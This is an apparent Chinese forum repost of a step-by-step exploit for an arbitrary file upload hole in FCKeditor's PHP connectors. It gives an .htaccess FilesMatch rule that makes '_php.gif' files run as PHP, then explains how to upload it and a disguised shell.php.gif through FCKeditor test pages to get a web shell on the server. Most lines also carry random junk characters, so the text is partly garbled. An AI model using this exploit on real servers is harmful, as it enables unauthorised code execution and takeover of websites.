FCKeditor所有php版本Upload上传漏洞: w$ S5 \ Y& G. ^6 u
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07( Y0 q# Q) B1 M V; }8 S& c
减小字体 增大字体4 v9 C( T$ T/ I8 g5 M
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability+ o' P7 P0 C1 H# g% x/ _
[+] Date: 20113 D0 N: S5 w4 n( K# f: `
[+] Author : sinesafe.cn
9 i6 U8 Q* G1 n# c[+] Website : WwW.sinesafe.cn
! S1 C; |: N# `9 W9 J2 Z———————————————————
& V* V# x8 R; S1 K# j! J* I1.create a htaccess file:
0 Y7 f) t3 \6 w! E/ [9 Y; Pcode:) P' C0 C" q. ]: k, H
<FilesMatch “_php.gif”>4 E5 [5 `# N3 R1 W- Y
SetHandler application/x-httpd-php
" |1 i% r- }7 H/ N9 {" h</FilesMatch>
9 s# W$ z+ W! p3 J7 F$ ^1 \* {3 I; `
2.Now upload this htaccess with FCKeditor.
: `( q& U- v8 k6 A7 _& R N; @
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html6 q$ v7 l$ _2 J
& _* L: S, B" J3 J" w
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
' ?1 u" ^7 d- ~& l: d
6 e9 b; V9 g; _* s———————————————————————————————-
2 f5 _- o3 _4 Q: U' z3.Now upload shell.php.gif with FCKeditor.) x+ M- P8 z, I8 j h2 s
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically." G9 e) O. y3 \0 A
5.http://www.sinesafe.cn/anything/shell_php.gif
) u+ \3 G: {( R& ~/ A. d) c6.Now shell is available from server. |
9 F' [2 d% {, w# ]. O: _3 _8 u; h7 d G( z
! y8 j9 r! x' H3 g1 Y" a' P0 K
|
发表于 2013-10-27 17:25:21
收藏
支持
反对